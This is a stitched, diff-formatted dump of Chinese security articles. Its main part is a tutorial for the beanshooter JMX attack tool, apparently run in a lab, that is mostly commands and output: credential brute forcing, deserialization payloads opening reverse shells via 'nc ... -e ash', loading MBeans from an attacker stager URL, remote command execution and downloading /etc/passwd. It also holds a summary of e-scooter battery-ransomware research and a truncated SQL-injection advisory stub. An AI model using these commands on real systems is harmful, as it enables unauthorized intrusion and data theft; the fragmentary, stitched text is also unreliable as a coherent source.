![](https://mmbiz.qpic.cn/mmbiz_gif/4yJaCArQwpACMJuBxI11jPgvHCxQZFQxPrt5iaQRibgGl0aIzFo4hDCYcFuyViag6zhuqNEjjeasfMEAy1rkaOahw/640?wx_fmt=gif&wxfrom=5&wx_lazy=1 "")
**圈子近期更新LD库**
![](https://mmbiz.qpic.cn/mmbiz_gif/4yJaCArQwpACMJuBxI11jPgvHCxQZFQxPrt5iaQRibgGl0aIzFo4hDCYcFuyViag6zhuqNEjjeasfMEAy1rkaOahw/640?wx_fmt=gif&wxfrom=5&wx_lazy=1 "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/yeJvia5dNx5ibvkW4kOOKEsgsWAVmfnvfMe3v0zbgAeT2YIhMjC9bNibjDfM2iaX1KBIPj20hjxAgv5zSN70prQbnw/640?wx_fmt=png&from=appmsg "")
**每篇文章均有详细且完整的手工WriteUp****跟其他只有POC没有验证截图的不一样**
![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/yeJvia5dNx5ibK7Dv4GdXpIuKGmLtjmiaeQuz0vbaPubOpv3oWAehI3Pr5flA7KQSUWtKIyycZezdAxmic5rpy2tHw/640?wx_fmt=other&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")
**星球提供免费F**a**![](https://mmbiz.qpic.cn/sz_mmbiz_png/yeJvia5dNx5ic3icibHW6nDoAAoX9Spv9mREyEWTD0kRZWwApI2LKZDlqDfFj0Hnbja85ppeKPty1oOKFD80G5iadWQ/640?wx_fmt=png&from=appmsg "")
**C**D通用证书********一起愉快的刷分**![](https://mmbiz.qpic.cn/sz_mmbiz_png/yeJvia5dNx5ibz6ibFL4b8QBThc3t0ok0Gb7jsseWcrYsxNbv9qyQ0uhDib7TkUcLIIos2iaYlzL6TcF3ia2Rric1EH1g/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/yeJvia5dNx5ickvP43lKosLxs8SB5kCSQQEP05NRM08qqN1YIrU1QF8ILRniaF4Vu2jbHhTypliczTnEuK5TXobk9A/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/mmbiz_gif/4yJaCArQwpACMJuBxI11jPgvHCxQZFQxPrt5iaQRibgGl0aIzFo4hDCYcFuyViag6zhuqNEjjeasfMEAy1rkaOahw/640?wx_fmt=gif&wxfrom=5&wx_lazy=1 "")
**免责声明**
![](https://mmbiz.qpic.cn/mmbiz_gif/4yJaCArQwpACMJuBxI11jPgvHCxQZFQxPrt5iaQRibgGl0aIzFo4hDCYcFuyViag6zhuqNEjjeasfMEAy1rkaOahw/640?wx_fmt=gif&wxfrom=5&wx_lazy=1 "")
![](https://mmbiz.qpic.cn/mmbiz_gif/HVNK6rZ71oofHnCicjcYq2y5pSeBUgibJg8K4djZgn6iaWb6NGmqxIhX2oPlRmGe6Yk0xBODwnibFF8XCjxhEV3K7w/640?wx_fmt=gif&wxfrom=5&wx_lazy=1 "")
文章所涉及内容,仅供安全研究与教学之用,由于传播、利用本文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。

View File

@ -1,5 +1,5 @@
# 【漏洞情报】快排查开源分享功能域名遭灰黑产抢注用作黑帽SEO # 【漏洞情报】快排查开源分享功能域名遭灰黑产抢注用作黑帽SEO
墨雪飘影 2024-11-27 00:52 原创 十二 F12sec 2024-11-27 00:44
![](https://mmbiz.qpic.cn/mmbiz_png/OBLmObCsZtRhFM3KeDj0QMtHtS04jFyCfsXLsRytlX5oAxgTNL5dYAAe5swJaOREVqksBqdUW8nzibErssPRu5w/640?wx_fmt=png "") ![](https://mmbiz.qpic.cn/mmbiz_png/OBLmObCsZtRhFM3KeDj0QMtHtS04jFyCfsXLsRytlX5oAxgTNL5dYAAe5swJaOREVqksBqdUW8nzibErssPRu5w/640?wx_fmt=png "")

View File

@ -0,0 +1,385 @@
# 【神兵利器】JAVA JMX漏洞利用工具
原创 Heptagram 七芒星实验室 2024-11-27 23:01
**基本介绍**
beanshooter是一个JMX枚举和攻击工具有助于识别JMX端点上的常见漏洞并提供了丰富的漏洞利用载荷和利用方式
#### 工具编译
我们也可以通过beanshooter来枚举并注册EvilBean到JMXServer端首先我们需要去下载beanshooter工具到本地随后
下到本地并进行打包
```
cd beanshooter
mvn package
```
![](https://mmbiz.qpic.cn/mmbiz_png/PJcQz9vmUicl19mYyKWyP8SoVIrb4oNJfmKlGiaqtHBjhYSa6UO5DKPjKHtwnBQdZ52fYxib4P8QBibO0ibOVreG9nw/640?wx_fmt=png&from=appmsg "")
#### 基本使用
基本操作是可以在JMX服务上执行的通用操作这些操作通常不以特定的MBean为目标或者以没有beanshooter内置支持的MBean为目标
##### 帮助信息
```
java -jar beanshooter.jar -h
```
![](https://mmbiz.qpic.cn/mmbiz_png/PJcQz9vmUicl19mYyKWyP8SoVIrb4oNJfsgCXibRYKdsuZmyIFBkjDawsSh2ttsy68PqtNG1JQoTFYumX1Y4lJGg/640?wx_fmt=png&from=appmsg "")
##### 信息收集
info操作可用于获取可用的属性信息
(1) 未授权模式:
```
java -jar beanshooter.jar info 172.17.0.2 9010
```
![](https://mmbiz.qpic.cn/mmbiz_png/PJcQz9vmUicl19mYyKWyP8SoVIrb4oNJfvhCf2AQ5CQBaWvEcv7Febho0fenEUibv5wBEDzA1h8tqqsY561kq3wg/640?wx_fmt=png&from=appmsg "")
(2) 授权认证模式
```
java -jar beanshooter.jar info 172.17.0.2 1090 --username admin --password admin
```
![](https://mmbiz.qpic.cn/mmbiz_png/PJcQz9vmUicl19mYyKWyP8SoVIrb4oNJficibt49wibWgk108Vacs6CkEytY2TiabNL9dYZbF0HfI5bLOYDjY54N4Mg/640?wx_fmt=png&from=appmsg "")
在没有附加参数的情况下调用时将打印所有可用MBeans的方法和属性信息在指定附加ObjectName时仅打印指定MBean的方法和属性信息
```
java -jar beanshooter.jar info 172.17.0.2 9010 java.lang:type=Memory
```
![](https://mmbiz.qpic.cn/mmbiz_png/PJcQz9vmUicl19mYyKWyP8SoVIrb4oNJfmG94KPibo79uKNGOkNh3thfe1ia83gCGaF2dJTMfaY2g1ksNMRrBTlHQ/640?wx_fmt=png&from=appmsg "")
##### 属性变更
attr模式下可以获取并显示指定属性的值
```
java -jar beanshooter.jar attr 172.17.0.2 9010 java.lang:type=Memory Verbose
```
![](https://mmbiz.qpic.cn/mmbiz_png/PJcQz9vmUicl19mYyKWyP8SoVIrb4oNJf4l1U97SyWW4ktm3eUia5sSCPPIQIWUA52RuiapKdGRmqJ9s63bmdib8Ig/640?wx_fmt=png&from=appmsg "")
如果我们传入其他附加的参数值,那么
beanshooter会去尝试设置相应的属性对于类型不同于字符串的属性则需要使用"-type"选项指定属性类型,例如:
```
java -jar beanshooter.jar attr 172.17.0.2 9010 java.lang:type=Memory Verbose true --type boolean
java -jar beanshooter.jar attr 172.17.0.2 9010 java.lang:type=Memory Verbose
```
![](https://mmbiz.qpic.cn/mmbiz_png/PJcQz9vmUicl19mYyKWyP8SoVIrb4oNJfAZ1nClSGJ9UoA0WSKo03HEV869Q2OqDcictp5XRsgcbswBKARGic1FsQ/640?wx_fmt=png&from=appmsg "")
##### 爆破操作
我们可以通过brute模块来对JMX服务进行暴力猜解攻击
(1) 默认模式
```
java -jar beanshooter.jar brute 172.17.0.2 1090
```
![](https://mmbiz.qpic.cn/mmbiz_png/PJcQz9vmUicl19mYyKWyP8SoVIrb4oNJfHbM09oAGiblyZtyribMl8IXYXKAObRjwibWldxS14nvxfj1Uw1zwV40cA/640?wx_fmt=png&from=appmsg "")
(2) 字典模式
用户可以按需指定用于进行暴力枚举的字典进行爆破尝试攻击,例如:
![](https://mmbiz.qpic.cn/mmbiz_png/PJcQz9vmUicl19mYyKWyP8SoVIrb4oNJfXhBSnjfibM7zAtbEM4weWHfAdAibic1icwYLGZn9dQ60PoVHtRfLPamSAg/640?wx_fmt=png&from=appmsg "")
##### 枚举操作
enum操作用于枚举JMX的配置信息它总是会去检查JMX端点是否需要"身份验证"以及是否"允许预先身份验证的任意反序列化"
```
java -jar beanshooter.jar enum 172.17.0.2 1090
```
![](https://mmbiz.qpic.cn/mmbiz_png/PJcQz9vmUicl19mYyKWyP8SoVIrb4oNJfbwiaC3av3xQGfQj0glsthYv5JQX7wWcTxA0FooicRRHlprLWqH552Ovg/640?wx_fmt=png&from=appmsg "")
如果当不需要身份验证或者当指定了有效的凭据时enum操作还会尝试从JMX端点枚举一些进一步的信息包括非默认MBeans的列表例如在Apache tomcat服务器上注册的用户帐户
```
java -jar beanshooter.jar enum 172.17.0.2 9010
```
![](https://mmbiz.qpic.cn/mmbiz_png/PJcQz9vmUicl19mYyKWyP8SoVIrb4oNJfC8qduliclib86KKWYTQby0Aria4UIeFbwTPOQxHqKsps1HdXvkKzLaJkg/640?wx_fmt=png&from=appmsg "")
在受SASL保护的端点上调用enum操作时beanshooter将试图枚举服务器配置的SASL配置文件这仅在一定程度上存在可能并且无法枚举服务器的TLS配置如果beanshooter识别SASL配置文件不起作用则应该总是在使用/不使用-ssl选项的情况下重试
```
java -jar beanshooter.jar enum 172.17.0.2 4447 --jmxmp
```
![](https://mmbiz.qpic.cn/mmbiz_png/PJcQz9vmUicl19mYyKWyP8SoVIrb4oNJfE8M4DpKfQMygSo4yqpFHfPslmACEtrUWlX50xnPc8a3gMPbtibDVqNg/640?wx_fmt=png&from=appmsg "")
##### 列举操作
list操作打印远程JMX服务上所有已注册MBeans的列表
```
java -jar beanshooter.jar list 172.17.0.2 9010
```
![](https://mmbiz.qpic.cn/mmbiz_png/PJcQz9vmUicl19mYyKWyP8SoVIrb4oNJf7MZEic3Rz968y0MGxbloicxykJvzALjibPrGrU190tzwkHQoyy7EyVrTA/640?wx_fmt=png&from=appmsg "")
##### 模型操作
model action实现了Markus Wulftange提出的一种技术允许使用者调用Java的任意公共类和静态方法此外还可以在用户创建的对象实例上调用公共对象方法唯一的要求是所使用的方法参数和所提供的对象实例(对于非静态方法)是可序列化的下面介绍了一个使用示例其中File对象作为对象实例提供并对其调用String[] list()操作:
```
java -jar beanshooter.jar model 172.17.0.2 9010 de.qtc.beanshooter:version=1 java.io.File 'new java.io.File("/")'
```
![](https://mmbiz.qpic.cn/mmbiz_png/PJcQz9vmUicl19mYyKWyP8SoVIrb4oNJfa5SJbMwMdiaIVlEbxSsUzkMiaLSjRGtdOTdqbmtZnoJoladu2bmsfpGA/640?wx_fmt=png&from=appmsg "")
```
java -jar beanshooter.jar invoke 172.17.0.2 9010 de.qtc.beanshooter:version=1 --signature 'list()'
```
![](https://mmbiz.qpic.cn/mmbiz_png/PJcQz9vmUicl19mYyKWyP8SoVIrb4oNJfa1uLOLJFFhqllnmYmgNfXoeSrY3UgLyxS1QdmW5QkkWe9ialKPTjjRw/640?wx_fmt=png&from=appmsg "")
setManagedResource方法也是可用的它可以用于更改要操作的对象实例
```
java -jar beanshooter.jar invoke 172.17.0.2 9010 de.qtc.beanshooter:version=1 --signature 'setManagedResource(Object a, String b)' 'new java.io.File("/etc")' objectReference
[+] Call was successful.
java -jar beanshooter.jar invoke 172.17.0.2 9010 de.qtc.beanshooter:version=1 --signature 'list()'
apk
shadow
crontabs
sysctl.conf
nsswitch.conf
profile.d
group
services
protocols
network
opt
logrotate.d
issue
passwd
init.d
udhcpd.conf
alpine-release
motd
hosts
sysctl.d
fstab
inittab
ssl
periodic
ssl1.1
os-release
modules
securetty
profile
modprobe.d
hostname
conf.d
modules-load.d
mtab
shells
secfixes.d
resolv.conf
root@RedTeam:~#
```
![](https://mmbiz.qpic.cn/mmbiz_png/PJcQz9vmUicl19mYyKWyP8SoVIrb4oNJfSdFiaYiahONiclGp0Kwssib34posPmuDXOiaTRtPcYWRicnMl8jiaocIJ1EUg/640?wx_fmt=png&from=appmsg "")
##### 反序列化
serial操作可用于在JMX端点上执行反序列化攻击默认情况下该操作会尝试验证后反序列化攻击要做到这一点您需要将JMX服务定位为允许未经身份验证的访问或者您需要有效的凭据
Step 1开启监听
```
nc -lnvp 1234
```
![](https://mmbiz.qpic.cn/mmbiz_png/PJcQz9vmUicl19mYyKWyP8SoVIrb4oNJfk4NHtVRgF7zteSjdrafUdbU1Uj7pP4kjY0MmKTgz1VX7DdOuibZpnhQ/640?wx_fmt=png&from=appmsg "")
Step 2发起反序列化请求如果出现下面的错误提示则说明是未配置yso.jar的路径
```
java -jar beanshooter.jar serial 172.17.0.2 1090 CommonsCollections6 "nc 172.17.0.1 1234 -e ash" --username admin --password admin
```
![](https://mmbiz.qpic.cn/mmbiz_png/PJcQz9vmUicl19mYyKWyP8SoVIrb4oNJfaHkrFHZToW7f30Chh0tUQSrRddgjl7icqUiacatNJZiahZNRhPbGW3ic6w/640?wx_fmt=png&from=appmsg "")
随后正常执行后可以成功反弹shell回来
![](https://mmbiz.qpic.cn/mmbiz_png/PJcQz9vmUicl19mYyKWyP8SoVIrb4oNJf72KwNhUSY8trGnmqKZWpu566PjLkoZwbkwqKeruCiaktEkEB8k8icbXg/640?wx_fmt=png&from=appmsg "")
JMX服务也容易受到预先验证的反序列化攻击要滥用这一点您可以使用-preauth开关
```
java -jar beanshooter.jar serial 172.17.0.2 1090 CommonsCollections6 "nc 172.17.0.1 4444 -e ash" --preauth
```
![](https://mmbiz.qpic.cn/mmbiz_png/PJcQz9vmUicl19mYyKWyP8SoVIrb4oNJfoWjhGJm9yibEa0aN4haq89O8EgxuCEAgjuphDrUPAtRTbkvahgMDLUg/640?wx_fmt=png&from=appmsg "")
备注针对JMXMP端点预先验证的反序列化通常是可能的不幸的是在枚举操作中没有办法正确地枚举它如果您遇到一个JMXMP端点您应该试一试
#### MBeans
MBean操作与针对JMX端点所暴露的通用功能的基本操作相比则是针对特定的MBeanBeanshooter对于每个支持的MBean都提供了另一个子解析器其中包含相应MBean的可用操作和选项以下列表展示了mlet MBean及其关联子解析器的示例
```
java -jar beanshooter.jar mlet -h
```
![](https://mmbiz.qpic.cn/mmbiz_png/PJcQz9vmUicl19mYyKWyP8SoVIrb4oNJfqlsRooCehnM0vm8ByQLJKVnETqouXIjxWodzd3Vqnk7mBEVMzPXSEg/640?wx_fmt=png&from=appmsg "")
##### Generic
Generic MBean操作反映了基本操作的功能但不需要指定ObjectName
###### 攻击操作
attr操作与基本操作中的attr操作相同然而不再需要指定ObjectName因为它已包含在所指定的MBean中
```
java -jar beanshooter.jar tomcat attr 172.17.0.2 1090 users
```
![](https://mmbiz.qpic.cn/mmbiz_png/PJcQz9vmUicl19mYyKWyP8SoVIrb4oNJf4bAaMib80nLN6cVKX0MPrK4IwI2oqsIVsvEHa85c6wHKUT2n925lqmw/640?wx_fmt=png&from=appmsg "")
###### 部署操作
deploy操作基本上与上面的deploy操作相同然而由于ClassName、ObjectName和实现的JAR文件都已与指定的MBean关联因此您只需在此操作中指定--stager-url选项(假设内置的jar文件可用)
```
java -jar beanshooter.jar tonka deploy 172.17.0.2 9010 --stager-url http://172.17.0.1:8000
```
![](https://mmbiz.qpic.cn/mmbiz_png/PJcQz9vmUicl19mYyKWyP8SoVIrb4oNJfHmjVExgkXL7z2q1DL7YYj3uZIHqWtSQMz71FuaAvXWaqxvpPpNK2Lg/640?wx_fmt=png&from=appmsg "")
###### 导出操作
在有时候我们会发现无法通过beanshooter的stager服务器提供MBean实现常见的情况之一是向本地机器的出站连接被阻止在这种情况下我们可能希望从其他位置加载MBean例如在具有写入权限的内部网络中的SMB服务export操作导出实现指定MBean的jar文件以及加载MBean所需的相应MLet HTML文档假设我们从监听在10.10.10.5的SMB服务提供TonkaBean那么可以使用以下命令
```
[qtc@devbox ~]$ beanshooter tonka export --export-dir export --stager-url file:////10.10.10.5/share/
[+] Exporting MBean jar file: export/tonka-bean-3.0.0-jar-with-dependencies.jar
[+] Exporting MLet HTML file to: export/index.html
[+] Class: de.qtc.beanshooter.tonkabean.TonkaBean
[+] Archive: tonka-bean-3.0.0-jar-with-dependencies.jar
[+] Object: MLetTonkaBean:name=TonkaBean,id=1
[+] Codebase: file:////10.10.10.5/share/
```
###### 常用信息
info操作列出指定MBean的方法和属性信息
```
java -jar beanshooter.jar tomcat info 172.17.0.2 1090
```
![](https://mmbiz.qpic.cn/mmbiz_png/PJcQz9vmUicl19mYyKWyP8SoVIrb4oNJfKLc5RYj8bh4QfXbMbicojxDEr15qlulwRDaraDPawwLosm2wsesyppg/640?wx_fmt=png&from=appmsg "")
###### 常规调用
invoke操作可用于在指定的MBean上调用任意方法
```
java -jar beanshooter.jar tomcat invoke 172.17.0.2 1090 --signature 'findUser(String username)' admin
```
![](https://mmbiz.qpic.cn/mmbiz_png/PJcQz9vmUicl19mYyKWyP8SoVIrb4oNJfqxAQlUjD5jyyY77qrYNtqadQFWqqxIV18U0atzsTCOxya3bicLunZXw/640?wx_fmt=png&from=appmsg "")
###### 选项信息
stats操作列出指定MBean的一些基本信息这些信息是beanshooter本地存储的与相应MBean相关的数据无需与服务器进行交互Jar文件信息指示相应MBean的实现是否内置在beanshooter中如果未使用--jar-file选项覆盖则在部署过程中将使用该jar文件目前TonkaBean是唯一一个具有可用Jar文件的MBean
```
java -jar beanshooter.jar tonka stats
```
![](https://mmbiz.qpic.cn/mmbiz_png/PJcQz9vmUicl19mYyKWyP8SoVIrb4oNJfcCbVw9QHDbRu5m8qnlwlQcNLV0jt8PFXMpB5Os8sM6KrwM1DHqGeIQ/640?wx_fmt=png&from=appmsg "")
###### 状态查询
status操作检查相应的MBean是否已在JMX服务上可用
```
java -jar beanshooter.jar tonka status 172.17.0.2 9010
```
![](https://mmbiz.qpic.cn/mmbiz_png/PJcQz9vmUicl19mYyKWyP8SoVIrb4oNJfeRpoErVia5h5uP8eoJsHsetKibKzWibZyVXQj2rnJUKrQoPlKdJh5OJLg/640?wx_fmt=png&from=appmsg "")
###### 卸载操作
undeploy操作从远程JMX服务中移除指定的MBean
```
java -jar beanshooter.jar tonka undeploy 172.17.0.2 9010
```
![](https://mmbiz.qpic.cn/mmbiz_png/PJcQz9vmUicl19mYyKWyP8SoVIrb4oNJfuGgUHApTOxVqxbFyLichLEiaAlPVGiaHJGj6wmjpHrmd6b7d0ABOh2ZHg/640?wx_fmt=png&from=appmsg "")
##### MLet
MLetMBean是一个众所周知的MBean它可以用于通过网络加载额外的MBean它已经被beanshooter的部署操作隐式使用同时也可以通过mlet操作手动调用
###### MLet Load
目前唯一实现的MLet方法是load操作可用于从用户指定的URL加载MBean类
```
java -jar beanshooter.jar mlet load 172.17.0.2 9010 tonka http://172.17.0.1:8000
```
![](https://mmbiz.qpic.cn/mmbiz_png/PJcQz9vmUicl19mYyKWyP8SoVIrb4oNJfDwdEN5nP9eL9F0nsTgjbI4v4uKpkFewyIREDze1lE6cmIRvHRYiawFA/640?wx_fmt=png&from=appmsg "")
上述示例演示了如何使用mlet操作手动加载TonkaBean如果您想要加载自定义MBean则需要指定关键字custom而不是tonka并提供--class-name、--object-name和--jar-file选项
```
java -jar beanshooter.jar mlet load 172.17.0.2 9010 custom http://172.17.0.1:8000 --class-name Evil --object-name Evil:name=Evil,id=1 --jar-file /root/jmx/JMXPayload.jar
```
![](https://mmbiz.qpic.cn/mmbiz_png/PJcQz9vmUicl19mYyKWyP8SoVIrb4oNJfSx3V7HqtGN8IRwib1NxZrldPDyEMfd1CeopY1tKG2GBSxutjSDzy6Mw/640?wx_fmt=png&from=appmsg "")
#### TONKA
TonkaBean是由beanshooter项目实现的自定义MBean允许在JMX服务器上访问文件系统和执行命令可以通过使用tonka操作来访问其所需的功能
##### Tonka Exec
exec操作可用于在RMI服务上执行单个命令
```
java -jar beanshooter.jar tonka exec 172.17.0.2 9010 id
```
![](https://mmbiz.qpic.cn/mmbiz_png/PJcQz9vmUicl19mYyKWyP8SoVIrb4oNJfNhQeXNpEjCELlKRAXt8E0vvH7da63OM5peog7JjQkSoic4Hz992Qryg/640?wx_fmt=png&from=appmsg "")
exec操作的最后一个参数预期为字符串当未使用"--shell"选项时,该字符串会在空格处拆分(考虑引号)并作为数组传递给服务器端的ProcessBuilder类
如果使用了"--shell"则指定的shell字符串会在空格处拆分生成的数组与指定的参数字符串连接后再传递给ProcessBuilder类这允许以类似shell的方式执行并正确解释shell特殊字符
```
java -jar beanshooter.jar tonka exec 172.17.0.2 9010 --shell 'ash -c' 'echo $HOSTNAME'
```
![](https://mmbiz.qpic.cn/mmbiz_png/PJcQz9vmUicl19mYyKWyP8SoVIrb4oNJfTib9qOqeTPmL0DtH68YPvDemVkMpS6Hp5Eiania4SG8zDEq1z0kTz3edQ/640?wx_fmt=png&from=appmsg "")
备注为了方便起见常见的shell会自动附加所需的命令字符串参数因此"--shell ash"会自动转换为--shell 'ash -c'
##### Tonka Execarray
execarray操作与exec动作非常相似但它不是期望一个字符串作为参数并在空格处分割该字符串以构建命令数组而是允许指定多个参数这些参数将直接作为ProcessBuilder类的命令数组使用
```
java -jar beanshooter.jar tonka execarray 172.17.0.2 9010 -- ash -c 'echo $HOME'
```
![](https://mmbiz.qpic.cn/mmbiz_png/PJcQz9vmUicl19mYyKWyP8SoVIrb4oNJfHJquo59z20gU6zGmUHVBIy9qxocCibQMtGM23GNG5iaUA8RwxZry3QAA/640?wx_fmt=png&from=appmsg "")
##### Tonka Shell
shell操作会启动一个命令行shell您可以在其中指定将在JMX服务器上执行的命令该shell并不是完全交互式的只是对Java的Runtime.exec方法的一个封装然而它实现了对环境变量和当前工作目录的基本支持
```
java -jar beanshooter.jar tonka shell 172.17.0.2 9010
```
![](https://mmbiz.qpic.cn/mmbiz_png/PJcQz9vmUicl19mYyKWyP8SoVIrb4oNJfD66JukQ2tJX89HnJNCYx6nLMpWIk8yk6mN1nfk7JlU87sibSf6SMricw/640?wx_fmt=png&from=appmsg "")
上面的示例演示了如何使用!env关键字设置环境变量除了这个关键字还有其他几个可用的关键字
![](https://mmbiz.qpic.cn/mmbiz_png/PJcQz9vmUicl19mYyKWyP8SoVIrb4oNJfATK6WCFx1PVsdzhlhq4AfFOyuW9IhNVbqxRtAiatSSLRLToteZYqjLg/640?wx_fmt=png&from=appmsg "")
##### Tonka Upload
upload操作可用于将文件上传到JMX服务器
```
java -jar beanshooter.jar tonka upload 172.17.0.2 9010 file.dat /tmp
```
![](https://mmbiz.qpic.cn/mmbiz_png/PJcQz9vmUicl19mYyKWyP8SoVIrb4oNJfD0pkY9VRWw6yfasyx5dYQr5WPvXF7TfVTIiaT2eV5V9v4OOb5uAVgew/640?wx_fmt=png&from=appmsg "")
##### Tonka Download
download操作可用于从JMX服务器下载文件
```
java -jar beanshooter.jar tonka download 172.17.0.2 9010 /etc/passwd
```
![](https://mmbiz.qpic.cn/mmbiz_png/PJcQz9vmUicl19mYyKWyP8SoVIrb4oNJfffIMWHFQY5bnXSICpOL5xGysSjneeLz1IiaMFN7qYCnz2h5j93icyL6A/640?wx_fmt=png&from=appmsg "")
**下载地址**
**点击下方名片进入公众号**
**回复关键字【**
**241128****】获取**
**下载链接**
****
**·推 荐 阅 读·**
# 最新后渗透免杀工具
# 【护网必备】高危漏洞综合利用工具
#    【护网必备】Shiro反序列化漏洞综合利用工具增强版
# 【护网必备】外网打点必备-WeblogicTool
# 【护网必备】最新Struts2全版本漏洞检测工具
# Nacos漏洞综合利用工具
# 重点OA系统漏洞利用综合工具箱  
# 【护网必备】海康威视RCE批量检测利用工具
# 【护网必备】浏览器用户密码|Cookie|书签|下载记录导出工具

View File

@ -0,0 +1,91 @@
# 小米电动滑板车漏洞或致电子木马攻击电池供电嵌入式系统上的勒索软件、跟踪、DoS和数据泄露问题研究
网空闲话 网空闲话plus 2024-11-27 23:39
**Arxiv论文网11月27日发布研究成果称帕多瓦大学和EURECOM的研究人员对小米电动滑板车的内部安全和隐私进行了首次分析发现了四个关键设计漏洞包括电池管理系统BMS的远程代码执行、固件未签名等问题。基于这些发现研究者开发了E-Trojans四种新型攻击手段包括电池勒索软件和用户跟踪攻击这些攻击可通过恶意应用远程或无线范围内实施。这些攻击严重威胁小米电动滑板车生态系统的安全、隐私和可用性。研究者还提出了四种实用对策以修复这些漏洞并增强系统安全性。实验结果表明欠压电池勒索软件能在三小时内减少M365电池一半的续航能力而用户跟踪攻击则能通过BLE泄露敏感数据。这项研究填补了电池供电嵌入式系统内部攻击面研究的空白并提出了相应的安全改进措施。**
![](https://mmbiz.qpic.cn/mmbiz_png/0KRmt3K30icWf6Cp2Ekrfn8RlpVAIzFXibGzfaMaicgEqnqt10knGjHl7zl1fJA2A1pqiaGjW6hI5jcavM7tHYMtYQ/640?wx_fmt=png&from=appmsg "")
**一、研究背景**
随着电池驱动的嵌入式系统BESs如笔记本电脑、智能手机、电动滑板车和无人机的普及这些设备的安全和隐私问题变得尤为重要。这些系统内部包含电池管理系统BMS、无线通信接口和电机控制器等组件但对这些内部攻击面的安全性研究却相对缺乏。特别是对于远程攻击者能够通过访问BMS实现什么目前还不清楚。这种理解的缺失主要是由于分析内部攻击面面临的挑战因为这些组件是供应商特定的、专有的且未文档化的。为了填补这一空白本研究对电动滑板车的内部进行了首次安全和隐私评估特别是小米M365和ES3电动滑板车及其与Mi Home它们的配套应用的交互。
![](https://mmbiz.qpic.cn/mmbiz_png/0KRmt3K30icWf6Cp2Ekrfn8RlpVAIzFXibxdhhKpxcoeiczNDv2BiasXIeZHAPnIzb5nibxzNZ65lbts0icy7iboSbutA/640?wx_fmt=png&from=appmsg "")
**二、动机和威胁模型**
研究动机在于BESs的复杂内部结构包括无线电、电机和电池管理系统等子系统以及通信总线和电池监控器等组件。对BESs内部的漏洞和攻击研究有限且这些设备的妥协可能导致严重的安全风险如电池损坏或引发火灾。此外BESs通常收集敏感数据包括用户身份和位置因此脆弱的设备可能导致隐私泄露。
![](https://mmbiz.qpic.cn/mmbiz_png/0KRmt3K30icWf6Cp2Ekrfn8RlpVAIzFXibTQjLY8Z6sHsHIJLIJHicxO1rlQ5sqx13Q3xLzy5Ik8OKNMtzwWtfaibA/640?wx_fmt=png&from=appmsg "")
本研究的威胁模型包括两个攻击者模型:
(i) 基于邻近的攻击者通过BLE无线与电动滑板车交互
(ii) 远程攻击者,通过在受害者的智能手机上安装恶意应用来远程利用电动滑板车。
攻击者的目标是利用发现的架构漏洞违反电动滑板车的安全性、安全性、隐私性和可用性。
**三、研究对象**
本研究聚焦于小米品牌的电动滑板车特别是M365和Mi3 (ES3)型号这两款滑板车涵盖了2016至2024年的两代产品并且被全球数百万人日常使用。这些用户包括拥有私人电动滑板车的人以及使用Bird和Lime等服务租赁小米电动滑板车的人。研究还涉及Mi Home这是小米电动滑板车的配套应用可用于Android和iOS系统。通过逆向工程研究者们揭露了小米电动滑板车的四个设计漏洞并基于这些发现提出了E-Trojans四种针对BES内部的新攻击。
**四、发现的四个漏洞**
研究中发现的四个关键设计漏洞包括:
**V1BMS固件未加密攻击者可以检索到明文的BCTRL固件并进行逆向工程**
**V2BMS固件未签名攻击者可以修改固件包括安全阈值和如何初始化BMON并在受害者的电动滑板车上刷入修改后的BCTRL**
**V3UART总线缺乏完整性保护、加密和认证攻击者可以通过访问UART总线例如通过恶意的BCTRL固件来窃听所有UART消息重放或伪造它们并冒充或中间人攻击DRV和BTS**
**V4UART总线缺乏对DoS的保护攻击者访问UART总线可以对内部BMS、BTS和DRV和外部Mi Home和电池充电器组件进行DoS攻击。**
这些漏洞属于已知的漏洞类别但在电动滑板车的背景下是新颖的它们源于小米专有协议的设计缺陷与特定的硬件或实现细节无关。因此这四个漏洞影响整个小米生态系统可能影响使用类似BCTRL和UART总线的其他小米设备。
**五、漏洞利用和攻击**
E-Trojans攻击利用四个主要漏洞对小米电动滑板车进行了一系列网络攻击具体条件、过程和后果如下
**1、电池欠压勒索软件UBR**
攻击者通过恶意固件关闭BCTRL的安全阈值检查使电池在充电时电压低于安全下限导致电池损坏。
攻击过程中,电池会快速放电至临界欠压状态,迫使用户支付赎金以恢复正常使用。
攻击结果可能导致电池寿命大幅缩短,甚至完全损坏,给用户带来经济损失。
**2、用户追踪UTI**
攻击者通过恶意固件收集滑板车内部硬件信息包括电机序列号等构建用户指纹并通过BLE广播泄露。
攻击过程中,用户的移动轨迹和私人数据被实时追踪和泄露,侵犯用户隐私,可能导致身份盗窃或其他安全风险。
**3、电动滑板车服务拒绝DES**
攻击者利用UART总线的漏洞发送恶意指令使滑板车内部组件无法正常工作如阻止电池充电、触发错误状态等。
攻击结果导致滑板车无法使用,影响用户的正常出行,同时可能对滑板车内部组件造成永久性损害。
**4、口令泄露和恢复PLR**
攻击者通过恶意固件从DRV读取并泄露滑板车的口令哈希然后通过BLE广播出去。攻击者可以离线破解口令获得对滑板车的控制权。这不仅侵犯了用户的隐私还可能导致滑板车被非法使用或数据泄露。
这些攻击展示了电动滑板车内部组件的安全漏洞可能带来的严重后果,包括财产损失、隐私侵犯和日常使用的不便。
![](https://mmbiz.qpic.cn/mmbiz_png/0KRmt3K30icWf6Cp2Ekrfn8RlpVAIzFXibfwgnSjmT9GCJtA4GS8JCgQWytqiaj1DZjlHgib2AqSnIiaCmWqY4U2XMw/640?wx_fmt=png&from=appmsg "")
**六、缓解措施和解决方案**
为了解决这些安全问题,论文提出了以下缓解措施:
C1使用TEA加密BCTRL固件保护固件的机密性。
C2使用ECDSA数字签名和验证BCTRL固件防止恶意固件更新。
C3使用SCP03保护UART总线确保通信的保密性、完整性和真实性。
C4对UART总线实施速率限制以保护或至少减轻DoS攻击。
这些措施旨在通过加密、签名验证和通信保护,增强固件和通信的安全性,从而防止类似的攻击发生。
**参考来源https://arxiv.org/html/2411.17184v1**

View File

@ -0,0 +1,40 @@
# 漏洞预警 | 懂微百择唯·供应链SQL注入漏洞
浅安 浅安安全 2024-11-28 00:00
**0x00 漏洞编号**
- # 暂无
**0x01 危险等级**
